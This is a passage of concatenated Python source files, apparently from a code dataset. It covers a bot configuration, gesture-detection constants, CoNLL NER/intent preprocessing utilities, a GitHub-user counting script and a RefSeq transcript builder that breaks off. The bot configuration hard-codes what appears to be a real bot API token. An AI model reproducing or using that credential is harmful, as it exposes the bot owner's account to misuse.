    print("evt.code = %i" % evt.code)
    print("evt.data = %d" % evt.data)
    print("evt.time = %i" % evt.time)
client.initialize()
client.register_callback_for_name("x", hello_x)
time.sleep(0.2)
try:
    while True:
        pass # probably should looks for a keypress or something
finally:
    # Fix: the original called finalize() on an undefined name 'server'
    # (NameError), and neither finalize call was reachable because the
    # infinite loop only exits via an exception. Running finalize() in a
    # 'finally' block makes cleanup happen on Ctrl-C.
    client.finalize()
|
991,431 | 33f44572032eed73e9ee7fd655af110a744eac7b | #token
# NOTE(review): hard-coded bot token committed to source control — move it
# to an environment variable / secrets store and rotate this token.
TOKEN = '732030625:AAHXvNnqwLREd1u6-nIyXqX_ZfL2PbKmwAA'
#language
from bot import rus_text
from bot import eng_text
# Language code used when the user has not chosen one.
DEFAULT_LANGUAGE = 'ru'
# Maps a language key to its text-resource module.
# NOTE(review): keys are inconsistent ('ru' lower-case vs 'ENG' upper-case);
# lookups with DEFAULT_LANGUAGE can only ever hit 'ru' — confirm intent.
TEXT = {
'ru': rus_text,
'ENG': eng_text
}
|
991,432 | 08ec9397be6530c5a0095952df8ad61d71107444 | '''
Constants Module
'''
''' Hue/Intensity Gesture Skin Detector Constants'''
class SkinCons(object):
    """Thresholds for the hue/intensity skin detector (LT = lower, UT = upper)."""
    # Hue channel bounds — presumably OpenCV's 0-179 hue scale; TODO confirm.
    HUE_LT = 3
    HUE_UT = 50
    # Intensity channel bounds — presumably an 8-bit 0-255 scale; TODO confirm.
    INTENSITY_LT = 15
    INTENSITY_UT = 250
''' Three Gesture Constants - Depth Lowerbound/UppperBound; Area Lowerbound/UppperBound'''
class GesConsAttributes(object):
    """Empty attribute holder; per-gesture thresholds are attached externally."""
class GesCons(object):
    """Per-gesture depth and area bounds (L = lower, U = upper).

    The commented numbers next to each gesture appear to be measured
    reference values the bounds were derived from — TODO confirm.
    """
    # 21.8, 741, 0.173
    FIST = GesConsAttributes()
    FIST.DEPTH_L = 20.0
    FIST.DEPTH_U = 30.0
    FIST.AREA_L = 0.15
    FIST.AREA_U = 0.22
    # 15.9, 915, 0.10996
    SCISSORS = GesConsAttributes()
    SCISSORS.DEPTH_L = 15.0
    SCISSORS.DEPTH_U = 20.0
    SCISSORS.AREA_L = 0.02
    SCISSORS.AREA_U = 0.15
    # 13.55, 1456, 0.247 ~ 0.634
    PALM = GesConsAttributes()
    PALM.DEPTH_L = 4.0
    PALM.DEPTH_U = 14.5
    PALM.AREA_L = 0.22
    PALM.AREA_U = 0.65
|
991,433 | 6d33ac5cab71eda9d44e62e0757e75a32d31bcc8 | import io
import numpy as np
import os
import pygtrie
import tempfile
# shared global variables to be imported from model also
UNK = "$UNK$"  # placeholder token for out-of-vocabulary words
NUM = "$NUM$"  # placeholder token substituted for purely-numeric tokens
NONE = "O"     # "outside" tag: token belongs to no chunk
# special error message
class MyIOError(Exception):
    """Raised when a required data file cannot be located.

    The message points the user at build_data.py, which generates the
    vocab / trimmed-vector files this project expects.
    """
    def __init__(self, filename):
        # custom error message
        message = """
ERROR: Unable to locate file {}.
FIX: Have you tried running python build_data.py first?
This will build vocab file from your train, test and dev sets and
trimm your word vectors.
""".format(filename)
        super(MyIOError, self).__init__(message)
class CoNLLDataset(object):
    """Class that iterates over a CoNLL-style dataset.

    __iter__ yields a tuple (intent, words, tags) per sentence:
        intent: sentence-level label (defaults to 'none' when absent)
        words: list of raw or processed words
        tags: list of raw or processed tags
    If processing_word / processing_tag / processing_dict / processing_intent
    are not None, the corresponding optional preprocessing is applied.
    Example:
        ```python
        data = CoNLLDataset(filename)
        for sentence, tags in data:
            pass
        ```
    """
    def __init__(self, file, processing_word=None, processing_tag=None,
                 processing_dict=None, processing_intent=None, max_iter=None, max_sent_len=None):
        """
        Args:
            file: a path to text file or a file object
            processing_word: (optional) function that takes a word as input
            processing_tag: (optional) function that takes a tag as input
            processing_dict: (optional) function that takes a sentence's
                word ids and returns dictionary features
            processing_intent: (optional) function applied to the intent label
            max_iter: (optional) max number of sentences to yield
            max_sent_len: (optional) truncate sentences to this many tokens
        """
        self.file = file
        self.processing_word = processing_word
        self.processing_tag = processing_tag
        self.processing_dict = processing_dict
        self.processing_intent = processing_intent
        self.max_iter = max_iter
        # Cached sentence count, computed lazily by __len__.
        self.length = None
        self.max_sent_len = max_sent_len
    def __iter__(self):
        niter = 0
        # Accept either a path (opened here) or an already-open file object.
        with open(self.file, encoding='utf-8') if isinstance(self.file, str) else self.file as f:
            intent, words, tags = '', [], []
            for line in f:
                line = line.strip()
                # Blank line (or -DOCSTART- marker) terminates a sentence.
                if len(line) == 0 or line.startswith("-DOCSTART-"):
                    if len(words) != 0:
                        niter += 1
                        if self.max_iter is not None and niter > self.max_iter:
                            break
                        # add dictionary feature
                        if self.processing_dict is not None:
                            # for word processing, we expect all ids
                            # (letter trigram id, char id and word id, ...) are extracted
                            if len(words) > 0 and type(words[0]) is not tuple:
                                raise Exception("Unexpected, word is not a tuple")
                            # Word id is the last element of each word tuple.
                            word_ids = [word[-1] for word in words]
                            dict_ids = self.processing_dict(word_ids)
                            # Prepend each word's dict feature to its tuple.
                            words = list(map(lambda w, d: ((d,) + w), words, dict_ids))
                        # max_sent_len
                        if self.max_sent_len is not None:
                            words = words[:self.max_sent_len]
                            tags = tags[:self.max_sent_len]
                        # intent
                        if not intent:
                            intent = 'none'
                        if self.processing_intent is not None:
                            intent = self.processing_intent(intent)
                        yield intent, words, tags
                        intent, words, tags = '', [], []
                else:
                    ls = line.split(' ')
                    if len(ls) == 1:
                        # Single-token line before the sentence = intent label.
                        if len(intent) != 0:
                            raise Exception('Unexpected line: {}'.format(line))
                        else:
                            intent = line
                    else:
                        # "word ... tag" line: first token is the word,
                        # last token is the tag.
                        word, tag = ls[0],ls[-1]
                        if self.processing_word is not None:
                            word = self.processing_word(word)
                        if self.processing_tag is not None:
                            tag = self.processing_tag(tag)
                        words += [word]
                        tags += [tag]
    def __len__(self):
        """Iterates once over the corpus to set and store length"""
        if self.length is None:
            self.length = 0
            for _ in self:
                self.length += 1
        return self.length
def get_CoNLL_dataset(filename, config, task_id):
    """Build a CoNLLDataset for one task, wired up with settings from *config*."""
    return CoNLLDataset(
        filename,
        config.processing_word,
        config.processing_tasks_tag[task_id],
        config.processing_dict,
        config.processing_task_intents[task_id],
        config.max_iter,
        config.max_sent_len)
def get_vocabs(datasets):
    """Collect intent, word and tag vocabularies from *datasets*.

    Args:
        datasets: iterable of datasets yielding (intent, words, tags) tuples
    Returns:
        (vocab_intents, vocab_words, vocab_tags) as sets
    """
    print("Building vocab...")
    intents, words, tags = set(), set(), set()
    for dataset in datasets:
        for intent, sent_words, sent_tags in dataset:
            intents.add(intent)
            words.update(sent_words)
            tags.update(sent_tags)
    print("- done. {} tokens".format(len(words)))
    return intents, words, tags
def get_letter_trigrams(word):
    """Return the letter trigrams of *word*, padded with '#' boundary markers."""
    padded = '#' + word + '#'
    all_trigrams = (padded[i:i + 3] for i in range(len(padded) - 2))
    # Drop trigrams containing whitespace,
    # e.g. " 16" in "+65 6272 1626" (not ascii space).
    return [t for t in all_trigrams if len(t.strip()) == 3]
def get_letter_trigram_vocab(vocab_words):
    """Return the set of all letter trigrams occurring in *vocab_words*."""
    trigrams = set()
    for word in vocab_words:
        for trigram in get_letter_trigrams(word):
            trigrams.add(trigram)
    return trigrams
def get_chunk_vocab(vocab_tags):
    """Return the set of chunk types (e.g. 'PER') present in *vocab_tags*."""
    return {get_chunk_type_from_name(tag)[1] for tag in vocab_tags}
def get_char_vocab(datasets, chars_lowercase=False):
    """Collect the character vocabulary from *datasets*.

    Args:
        datasets: iterable of datasets yielding (intent, words, tags)
        chars_lowercase: lower-case words before collecting characters
    Returns:
        set of all characters seen
    """
    chars = set()
    for dataset in datasets:
        for _, words, _ in dataset:
            for word in words:
                chars.update(word.lower() if chars_lowercase else word)
    return chars
def get_glove_vocab(filename):
    """Load the word vocabulary from a GloVe vectors file.

    Args:
        filename: path to the glove vectors (word followed by floats per line)
    Returns:
        vocab: set() of strings
    """
    print("Building vocab...")
    vocab = set()
    with open(filename, encoding='utf-8') as f:
        for line in f:
            # The first whitespace-separated field is the word itself.
            vocab.add(line.strip().split(' ')[0])
    print("- done. {} tokens".format(len(vocab)))
    return vocab
def get_class_weights(filename, classes_num=None):
    """Read per-class weights from *filename* (one float per non-empty line).

    When the file is missing, falls back to uniform 1.0 weights if
    *classes_num* is given, otherwise raises.
    """
    if not os.path.exists(filename):
        if classes_num is None:
            raise Exception('Invalid class weights: {}'.format(filename))
        return [1.0] * classes_num
    weights = []
    with open(filename, encoding='utf-8') as f:
        for raw in f:
            raw = raw.strip()
            if raw:
                weights.append(float(raw))
    return weights
def write_vocab(vocab, filename):
    """Write *vocab* to *filename*, one word per line.

    No newline is written after the final word, so round-tripping with
    load_vocab preserves the entry count.
    """
    print("Writing vocab...")
    last_index = len(vocab) - 1
    with open(filename, "w", encoding='utf-8') as f:
        for i, word in enumerate(vocab):
            f.write(word if i == last_index else "{}\n".format(word))
    print("- done. {} tokens".format(len(vocab)))
def load_vocab(filename):
    """Load a vocab file (one word per line) into a dict word -> line index.

    Raises:
        MyIOError: when the file cannot be opened.
    """
    try:
        with open(filename, encoding='utf-8') as f:
            return {word.strip(): idx for idx, word in enumerate(f)}
    except IOError:
        raise MyIOError(filename)
def trim_words(word_set, data_sets, num):
    """Keep the *num* most frequent members of *word_set* as counted in *data_sets*.

    Args:
        word_set: candidate words
        data_sets: datasets yielding (word_list, _) pairs
        num: number of words to retain
    Returns:
        set with at most *num* words
    """
    counts = {}
    for data in data_sets:
        for word_list, _ in data:
            for word in word_list:
                if word in word_set:
                    counts[word] = counts.get(word, 0) + 1
    ranked = sorted(counts, key=lambda w: counts[w], reverse=True)
    return set(ranked[:num])
def export_trimmed_glove_vectors(vocab, glove_filename, trimmed_filename, dim):
    """Extract embeddings for *vocab* from a GloVe file and save as .npz.

    Args:
        vocab: dict word -> row index in the output matrix
        glove_filename: path to the GloVe text file
        trimmed_filename: output path for the compressed npz archive
        dim: embedding dimensionality

    Words absent from the GloVe file keep all-zero vectors.
    """
    embeddings = np.zeros([len(vocab), dim])
    with open(glove_filename, encoding='utf-8') as f:
        for line in f:
            fields = line.strip().split(' ')
            word = fields[0]
            if word in vocab:
                vector = [float(x) for x in fields[1:]]
                embeddings[vocab[word]] = np.asarray(vector)
    np.savez_compressed(trimmed_filename, embeddings=embeddings)
def get_trimmed_glove_vectors(filename):
    """Return the 'embeddings' matrix stored in the given .npz file.

    Raises:
        MyIOError: when the file cannot be opened.
    """
    try:
        with np.load(filename) as archive:
            return archive["embeddings"]
    except IOError:
        raise MyIOError(filename)
def concate_list_and_tuple(a_list, b_num_or_tuple):
    """Prepend *a_list* to *b_num_or_tuple*, flattening exact tuples.

    (lst, (x, y)) -> (lst, x, y); (lst, x) -> (lst, x).
    Note: intentionally checks the exact type, so tuple subclasses are
    treated as plain values, matching the original behavior.
    """
    if type(b_num_or_tuple) is tuple:
        return (a_list,) + b_num_or_tuple
    return a_list, b_num_or_tuple
def get_processing_word(vocab_words=None, vocab_chars=None,
                        vocab_letter_trigrams=None, lowercase=False,
                        chars=False, chars_lowercase=False, letter_trigrams=False, allow_unk=True, max_word_len=None):
    """Return a function that transforms a word (string) into ids.

    Depending on the flags, the returned function maps a word to its word id
    alone, or to a tuple nesting char ids and/or letter-trigram ids around it.

    Args:
        vocab_words: dict[word] = idx (word -> id)
        vocab_chars: dict[char] = idx; used only when chars=True
        vocab_letter_trigrams: dict[trigram] = idx; used only when letter_trigrams=True
        lowercase: lower-case the word before the word-id lookup
        chars: also emit character ids
        chars_lowercase: lower-case the word before char-id extraction
        letter_trigrams: also emit letter-trigram ids
        allow_unk: map unknown words to the UNK id instead of leaving them raw
        max_word_len: truncate char/trigram id lists to this length
    Returns:
        f("cat") = ([12, 4, 32], 12345)
                 = (list of char ids, word id)
    """
    def f(word):
        # 0. get chars of words (from the original casing, before step 1)
        if vocab_chars is not None and chars:
            char_ids = []
            char_word = word
            if chars_lowercase:
                char_word = char_word.lower()
            for char in char_word:
                # ignore chars out of vocabulary
                if char in vocab_chars:
                    char_ids += [vocab_chars[char]]
            if max_word_len is not None:
                char_ids = char_ids[:max_word_len]
        # 1. preprocess word (lowercasing and numeric normalization affect
        # the trigram and word-id lookups below, but not the char ids above)
        if lowercase:
            word = word.lower()
        if word.isdigit():
            word = NUM
        # 2. get id of letter trigrams
        if vocab_letter_trigrams is not None and letter_trigrams == True:
            letter_trigram_ids = []
            for l3t in get_letter_trigrams(word):
                # ignore letter trigrams out of vocabulary
                if l3t in vocab_letter_trigrams:
                    letter_trigram_ids += [vocab_letter_trigrams[l3t]]
            if max_word_len is not None:
                letter_trigram_ids = letter_trigram_ids[:max_word_len]
        # 3. get id of word (unknown words map to UNK when allow_unk,
        # otherwise the raw string passes through unchanged)
        if vocab_words is not None:
            if word in vocab_words:
                word = vocab_words[word]
            else:
                if allow_unk:
                    word = vocab_words[UNK]
                #else:
                #    raise Exception("Unknown key is not allowed. Check that "\
                #                    "your vocab (tags?) is correct")
        # 4. return tuple: letter trigram ids, char ids, word id
        result = word
        if vocab_chars is not None and chars == True:
            result = concate_list_and_tuple(char_ids, result)
        if vocab_letter_trigrams is not None and letter_trigrams == True:
            result = concate_list_and_tuple(letter_trigram_ids, result)
        return result
    return f
def get_processing_dict(trie, ndict_types, trie_separator='.s'):
    """Return a function mapping a sentence's word ids to dictionary features.

    For each token position the feature vector has 2 * ndict_types slots:
    slot 2*t is set when a dictionary entry of type t starts there, and slot
    2*t+1 is set on every continuation position covered by the matched entry
    (longest-prefix match against *trie*, whose keys are separator-joined
    word-id strings).
    """
    def f(word_ids):
        word_ids = [str(word_id) for word_id in word_ids]
        dict_feat = [[0] * 2 * ndict_types for word_id in word_ids]
        for i in range(len(word_ids)):
            # Match the longest dictionary entry starting at position i.
            sent = trie_separator.join(word_ids[i:])
            prefix, dict_type = trie.longest_prefix(sent)
            if dict_type is not None:
                # Mark the entry's start position...
                dict_feat[i][2 * dict_type] = 1
                # ...and each following token the matched entry spans.
                for j in range(1, len(prefix.split(trie_separator))):
                    dict_feat[i + j][2 * dict_type + 1] = 1
        return tuple(dict_feat)
    return f
def _pad_sequences(sequences, pad_tok, max_length):
"""
Args:
sequences: a generator of list or tuple
pad_tok: the char to pad with
Returns:
a list of list where each sublist has same length
"""
sequence_padded, sequence_length = [], []
for seq in sequences:
seq = list(seq)
seq_ = seq[:max_length] + [pad_tok]*max(max_length - len(seq), 0)
sequence_padded += [seq_]
sequence_length += [min(len(seq), max_length)]
return sequence_padded, sequence_length
def pad_sequences(sequences, pad_tok, nlevels=1):
    """Pad a batch of sequences to uniform length.

    Args:
        sequences: sequences of tokens (nlevels=1), or sequences of
            per-word id lists such as char ids (nlevels=2)
        pad_tok: the element to pad with
        nlevels: "depth" of padding, 1 or 2
    Returns:
        (sequence_padded, sequence_length)
    """
    if nlevels == 1:
        longest = max(len(s) for s in sequences)
        sequence_padded, sequence_length = _pad_sequences(sequences,
                                                          pad_tok, longest)
    elif nlevels == 2:
        # First pad every word to the longest word length...
        longest_word = max(max(len(w) for w in seq) for seq in sequences)
        sequence_padded, sequence_length = [], []
        for seq in sequences:
            # all words are same length now
            word_padded, word_lengths = _pad_sequences(seq, pad_tok, longest_word)
            sequence_padded.append(word_padded)
            sequence_length.append(word_lengths)
        # ...then pad every sentence to the longest sentence length.
        longest_sent = max(len(s) for s in sequences)
        sequence_padded, _ = _pad_sequences(sequence_padded,
                                            [pad_tok] * longest_word, longest_sent)
        sequence_length, _ = _pad_sequences(sequence_length, 0,
                                            longest_sent)
    return sequence_padded, sequence_length
def minibatches(data, minibatch_size):
    """Yield (intents, inputs, labels) batches of at most *minibatch_size*.

    Sentences whose words are feature tuples (char ids, word id, ...) are
    transposed so each feature becomes its own per-sentence sequence.
    """
    intents, xs, ys = [], [], []
    for intent, x, y in data:
        if len(xs) == minibatch_size:
            yield intents, xs, ys
            intents, xs, ys = [], [], []
        if type(x[0]) == tuple:
            x = list(zip(*x))
        intents.append(intent)
        xs.append(x)
        ys.append(y)
    # Flush the final, possibly short, batch.
    if xs:
        yield intents, xs, ys
def get_chunk_type(tok, idx_to_tag):
    """Map a tag id to its (class, type) pair.

    Args:
        tok: id of a token's tag, e.g. 4
        idx_to_tag: dictionary {4: "B-PER", ...}
    Returns:
        tuple such as ("B", "PER")
    """
    return get_chunk_type_from_name(idx_to_tag[tok])
def get_chunk_type_from_name(tag_name):
    """Split an IOB tag into (class, type): "B-PER" -> ("B", "PER"); "O" -> ("O", "O")."""
    pieces = tag_name.split('-')
    return pieces[0], pieces[-1]
def get_chunks(seq, tags):
    """Given a sequence of tags, group entities and their position

    Args:
        seq: [4, 4, 0, 0, ...] sequence of labels
        tags: dict["O"] = 4
    Returns:
        list of (chunk_type, chunk_start, chunk_end)
    Example:
        seq = [4, 5, 0, 3]
        tags = {"B-PER": 4, "I-PER": 5, "B-LOC": 3}
        result = [("PER", 0, 2), ("LOC", 3, 4)]
    """
    default = tags[NONE]
    idx_to_tag = {idx: tag for tag, idx in tags.items()}
    chunks = []
    # State: the type and start index of the chunk currently being built.
    chunk_type, chunk_start = None, None
    for i, tok in enumerate(seq):
        # End of a chunk 1: an "O" tag closes any open chunk.
        if tok == default and chunk_type is not None:
            # Add a chunk.
            chunk = (chunk_type, chunk_start, i)
            chunks.append(chunk)
            chunk_type, chunk_start = None, None
        # End of a chunk + start of a chunk!
        elif tok != default:
            tok_chunk_class, tok_chunk_type = get_chunk_type(tok, idx_to_tag)
            if chunk_type is None:
                # No open chunk: this token starts one.
                chunk_type, chunk_start = tok_chunk_type, i
            elif tok_chunk_type != chunk_type or tok_chunk_class == "B":
                # Type change or an explicit "B-" tag closes the open
                # chunk and starts a new one at this position.
                chunk = (chunk_type, chunk_start, i)
                chunks.append(chunk)
                chunk_type, chunk_start = tok_chunk_type, i
        else:
            pass
    # end condition: close a chunk still open at the end of the sequence.
    if chunk_type is not None:
        chunk = (chunk_type, chunk_start, len(seq))
        chunks.append(chunk)
    return chunks
def get_all_chunks(seq, tags):
    """Like get_chunks, but also includes the "O" spans as chunks.

    Example:
        seq = [4, 5, 0, 3]
        tags = {"B-PER": 4, "I-PER": 5, "B-LOC": 3, "O": 0}
        result = [("PER", 0, 2), ('O', 2, 3) ("LOC", 3, 4)]
    """
    default = tags[NONE]
    idx_to_tag = {idx: tag for tag, idx in tags.items()}
    chunks = []
    chunk_type, chunk_start = None, None
    for i, tok in enumerate(seq):
        tok_chunk_class, tok_chunk_type = get_chunk_type(tok, idx_to_tag)
        # A "B-" tag or any type change closes the current chunk ("O" runs
        # merge because consecutive "O" tokens share the same type).
        if tok_chunk_class == "B" or tok_chunk_type != chunk_type:
            if chunk_type is not None and chunk_start is not None:
                chunk = (chunk_type, chunk_start, i)
                chunks.append(chunk)
            chunk_type = tok_chunk_type
            chunk_start = i
    # Close the final open chunk.
    if chunk_type is not None and chunk_start is not None:
        chunk = (chunk_type, chunk_start, len(seq))
        chunks.append(chunk)
    # verify: the non-"O" chunks must agree with get_chunks.
    if set([c for c in chunks if c[0] != NONE]) != set(get_chunks(seq, tags)):
        raise Exception("Result of get_all_chunks is inconsistent with get_chunks")
    return chunks
def get_pr(metrics):
    """Compute precision/recall/F1 columns from per-class count metrics.

    Args:
        metrics: array whose columns are — presumably — (true positives,
            predicted count, actual count) per class; confirm against caller.
    Returns:
        array with columns (precision, recall, f1); zero where undefined.
    """
    true_pos = metrics[:, 0]
    nonzero = true_pos != 0
    precision = np.divide(true_pos, metrics[:, 1],
                          out=np.zeros_like(true_pos), where=nonzero)
    recall = np.divide(true_pos, metrics[:, 2],
                       out=np.zeros_like(true_pos), where=nonzero)
    # Harmonic mean, guarded against precision + recall == 0.
    f1_numer = 2 * np.multiply(precision, recall)
    f1_denom = np.add(precision, recall)
    f1 = np.divide(f1_numer, f1_denom,
                   out=np.zeros_like(f1_numer), where=f1_denom != 0)
    return np.vstack([precision, recall, f1]).transpose()
def get_ordered_keys(dictionary):
    """Return the dictionary's keys sorted by their values (ascending)."""
    return sorted(dictionary, key=dictionary.get)
def get_dict_trie(dict_file_name, processing_word=None, processing_dict_type=None, trie_separator='.'):
    """Load a TSV dictionary ("sentence<TAB>type" per line) into a StringTrie.

    When *processing_word* is given, keys become separator-joined word-id
    strings and entries containing any unknown word are skipped entirely.
    When *processing_dict_type* is given, the type labels are mapped too.

    Returns:
        (trie, paths, dict_types): the trie, the "key\\ttype" strings
        actually inserted, and the distinct type values seen.
    """
    trie = pygtrie.StringTrie(separator=trie_separator)
    paths = []
    dict_types = set()
    # Sentinel id used to detect out-of-vocabulary words below.
    UNK_word_id = processing_word(UNK) if processing_word is not None else -1
    with open(dict_file_name, encoding='utf-8') as f:
        for line in f:
            line = line.strip()
            if line:
                sent, dict_type = line.split('\t')
                if processing_word is not None:
                    word_ids = [processing_word(word) for word in sent.split(' ')]
                    # Skip entries with any unknown word.
                    if UNK_word_id in word_ids:
                        continue
                    sent = trie_separator.join([str(word_id) for word_id in word_ids])
                if processing_dict_type is not None:
                    dict_type = processing_dict_type(dict_type)
                trie[sent] = dict_type
                paths.append('{}\t{}'.format(sent, dict_type))
                dict_types.add(dict_type)
    return trie, paths, list(dict_types)
def create_memory_file_from_words(words):
    """Build an in-memory CoNLL-style file: one "word O" line per word,
    terminated by a blank line."""
    lines = ['{} O'.format(word) for word in words]
    return io.StringIO('\n'.join(lines) + '\n\n')
def get_task_vocab(filenames):
    """Derive task names from file names such as 'train_en.txt' -> 'en'.

    Falls back to stringified indices when any file name lacks an underscore.
    """
    if not all('_' in name for name in filenames):
        return [str(i) for i in range(len(filenames))]
    return [name.rsplit('.', 1)[0].rsplit('_', 1)[1] for name in filenames]
def get_name_for_task(prefix, task_name):
    """Compose a per-task file name of the form '<prefix>_<task_name>.txt'."""
    return prefix + "_" + task_name + ".txt"
def merge_lists_alternate(lists, len_per_list):
    """Interleave *lists* round-robin for *len_per_list* rounds.

    Produces len(lists) * len_per_list items; shorter lists wrap around to
    their beginning when exhausted.
    """
    merged = []
    cursors = [0] * len(lists)
    sizes = [len(lst) for lst in lists]
    for _ in range(len_per_list):
        for k, lst in enumerate(lists):
            merged.append(lst[cursors[k]])
            cursors[k] = (cursors[k] + 1) % sizes[k]
    return merged
def merge_datasets(datasets, batch_size, random_seed, mode):
    """Combine minibatches from several datasets for multi-task training.

    mode 'permute': keep each dataset's first batch up front, shuffle the rest.
    mode 'cycle': shuffle each dataset's batches, then interleave round-robin.
    Each item is (dataset_index, (batch_index, minibatch)).
    """
    per_dataset = []
    for idx, dataset in enumerate(datasets):
        numbered = enumerate(minibatches(dataset, batch_size))
        per_dataset.append([(idx, mb_enum) for mb_enum in numbered])
    if mode == 'permute':
        heads = [batches[0] for batches in per_dataset]
        tail = [mb for batches in per_dataset for mb in batches[1:]]
        np.random.RandomState(seed=random_seed).shuffle(tail)
        return heads + tail
    if mode == 'cycle':
        for batches in per_dataset:
            np.random.RandomState(seed=random_seed).shuffle(batches)
        return merge_lists_alternate(per_dataset, max(len(b) for b in per_dataset))
    raise Exception('Unsupported mode: {}'.format(mode))
if __name__ == "__main__":
    # Self-checks for the chunking, trie and dict-feature helpers.
    seq = [4, 5, 0, 3]
    tags = {"B-PER": 4, "I-PER": 5, "B-LOC": 3, "O": 0}
    # Expected: [("PER", 0, 2), ('O', 2, 3) ("LOC", 3, 4)]
    result = get_all_chunks(seq, tags)
    print(result)
    print([c for c in result if c[0] != NONE] == get_chunks(seq, tags))
    seq = [4, 5, 5, 4, 0, 0, 3, 5, 3]
    tags = {"B-PER": 4, "I-PER": 5, "B-LOC": 3, "O": 0}
    # Expected: [('PER', 0, 3), ('PER', 3, 4), ('O', 4, 6), ('LOC', 6, 7), ('PER', 7, 8), ('LOC', 8, 9)]
    result = get_all_chunks(seq, tags)
    print(result)
    print([c for c in result if c[0] != NONE] == get_chunks(seq, tags))
    tmp_dict_filename = ''
    with tempfile.NamedTemporaryFile("w", delete=False) as tmp:
        tmp.write("The big bang theory\tTV\n")
        tmp.write("Game of the thrones\tTV\n")
        tmp.write("Angry Birds\tMOVIE\n")
        tmp_dict_filename = tmp.name
    trie, _, dict_types = get_dict_trie(tmp_dict_filename)
    print(trie)
    assert(set(dict_types) == set(['MOVIE', 'TV']))
    vocab_words = {'big': 0, 'bang': 1, 'the': 2, 'theory': 3, UNK: 4}
    processing_words = get_processing_word(vocab_words, lowercase=True, allow_unk=True)
    vocab_dict_types = {'MOVIE': 0, 'TV': 1}
    processing_dict_type = get_processing_word(vocab_dict_types)
    trie, _, dict_types = get_dict_trie(tmp_dict_filename, processing_words, processing_dict_type)
    print(trie)
    assert(set(dict_types) == set([0, 1]))
    words = [([0], 1), ([0, 1], 5), ([0, 1, 2], 3), ([0, 1, 2, 3], 5),
             ([0, 1, 2, 3, 4], 4), ([0, 1, 2, 3, 4, 5], 62),
             ([0, 1, 2, 3, 4, 5, 6], 9)]
    sep = '.'
    # Fix: was 'trie = trie = pygtrie.StringTrie(...)' (duplicated assignment).
    trie = pygtrie.StringTrie(separator=sep)
    trie['3.5'] = 1
    trie['3.5.4'] = 1
    trie['3.5.4.6'] = 1
    processing_dict = get_processing_dict(trie, 2, sep)
    dict_ids = processing_dict([word[-1] for word in words])
    print(dict_ids)
    print(list(map(lambda w, d: ((d,) + w), words, dict_ids)))
991,434 | 087f988cf63b9fb3b4470989f6f89698b4c92bea | '''
Read all the actorlogins csv files saved in the actorlogin
dir and extract all the unique user actorlogins along with
how many times each user interacted with the github
platform. After extracting this information save it into a
unique users file.
(ONE TIME EXECUTION)
'''
import os

# Tally how many data rows each user login appears in across every *.csv
# file in the current directory.  The first space-separated field of each
# row is the login; the first (header) line of every file is skipped.
users = {}
for csv_file in sorted(x for x in os.listdir() if x.endswith('.csv')):
    print("Working on file", csv_file)
    with open(csv_file) as handle:
        handle.readline()  # skip header line
        for row in handle:
            login = row.strip().split(" ")[0]
            users[login] = users.get(login, 0) + 1
print("\nTotal number of unique users:", len(users))
out_file = "unique_users.csv"
print("\nWriting unique users to file:", out_file)
with open(out_file, "w") as sink:
    for login, count in users.items():
        sink.write(login + " " + str(count) + "\n")
print("Done")
|
991,435 | 94ea4dd4c163d3840e2105f2ea2eb00c04127141 | #!/usr/bin/env python
import shelve
import numpy as np
import sys
from rnarry.sequtils import GiantFASTAFile
from rnarry.sequtils import reverse_complement
from rnarry.utils import textwrap
from rnarry.bxwrap import MultiTrackSplitBinnedArray
# Minimum read depth, and minimum fraction of reads agreeing, required to
# call a base at a position (see process()).
MINREADSTOCALL = 10
MINPERCENTTOCALL = 0.9
# Total length covered by a list of (start, end) blocks.
blklength = lambda blks: sum(end-start for start, end in blks)
class ContinuousCache(object):
    """Single-slot cache holding only the most recently opened resource.

    ``opener(key)`` runs only when ``get`` is asked for a key different
    from the one currently held; repeated lookups of the same key reuse
    the cached object.
    """

    def __init__(self, opener):
        self.curkey = None
        self.current = None
        self.opener = opener

    def get(self, key):
        """Return the resource for `key`, opening it only on a key change."""
        if key == self.curkey:
            return self.current
        self.curkey = key
        self.current = self.opener(key)
        return self.current
def process(nrlist):
    """For each RefSeq accession in nrlist, rebuild its transcript sequence
    from the genome, overwrite positions where RNA-seq reads confidently
    call a different base, then write the result as FASTA plus a BED line
    marking the CDS (NM_* accessions) or the whole exonic span (others).

    Relies on module globals set up in __main__: refFlat, mm9, rseqarr,
    bedout, faout.  Python 2 only (print-chevron syntax below).
    """
    # Indices of the per-nucleotide coverage tracks (A/C/G/T).
    nucleotidetracks = [rseqarr.TRACKS.index(i) for i in 'ACGT']
    for nracc in nrlist:
        dbinfo = refFlat[nracc]
        chrom = dbinfo['chrom']
        # Concatenate exon blocks into the spliced transcript sequence.
        genomeseq = ''.join(mm9.get(chrom, blkstart, blkend)
                            for blkstart, blkend in dbinfo['exonBlocks']).upper()
        # Left/right UTR blocks swap roles on the minus strand.
        if dbinfo['strand'] == '-':
            utr3, utr5 = 'leftUtrBlocks', 'rightUtrBlocks'
        else:
            utr5, utr3 = 'leftUtrBlocks', 'rightUtrBlocks'
        if nracc.startswith('NM_'):
            utr5length = blklength(dbinfo[utr5])
            cdslength = blklength(dbinfo['cdsBlocks'])
            utr3length = blklength(dbinfo[utr3])
        else:
            exonlength = blklength(dbinfo['exonBlocks'])
        # Per-base nucleotide counts over the exon blocks.
        cntarray = rseqarr.get_blocks(dbinfo['chrom'], dbinfo['exonBlocks'],
                                      dbinfo['strand'])[nucleotidetracks]
        # clip(1) avoids division by zero at uncovered positions.
        depthcnt = np.array(cntarray.sum(0).clip(1), 'd')
        # A call is confident when one base dominates and depth suffices.
        confidentcalls = ((cntarray/depthcnt >= MINPERCENTTOCALL) *
                          (depthcnt >= MINREADSTOCALL))
        mutatedseq = list(genomeseq)
        for base, calls in zip('ACGT', confidentcalls):
            for pos in np.where(calls)[0]:
                mutatedseq[pos] = base
        mutatedseq = ''.join(mutatedseq)
        if dbinfo['strand'] == '-':
            mutatedseq = reverse_complement(mutatedseq)
        # BED record: CDS span for NM_*, whole exonic span otherwise.
        if nracc.startswith('NM_'):
            print >> bedout, '\t'.join([nracc, str(utr5length),
                                        str(utr5length + cdslength),
                                        '%s' % dbinfo['geneName'], '.', '+'])
        else:
            print >> bedout, '\t'.join([nracc, '0', str(exonlength),
                                        '%s' % dbinfo['geneName'], '.', '+'])
        print >> faout, '>%s %s' % (nracc, dbinfo['geneName'])
        faout.write(textwrap(mutatedseq))
if __name__ == '__main__':
    # CLI: refFlat-shelve nr-list genome-fasta rnaseq-space out.fa out.bed
    refflatdbpath = sys.argv[1]
    nrlistpath = sys.argv[2]
    genomefastapath = sys.argv[3]
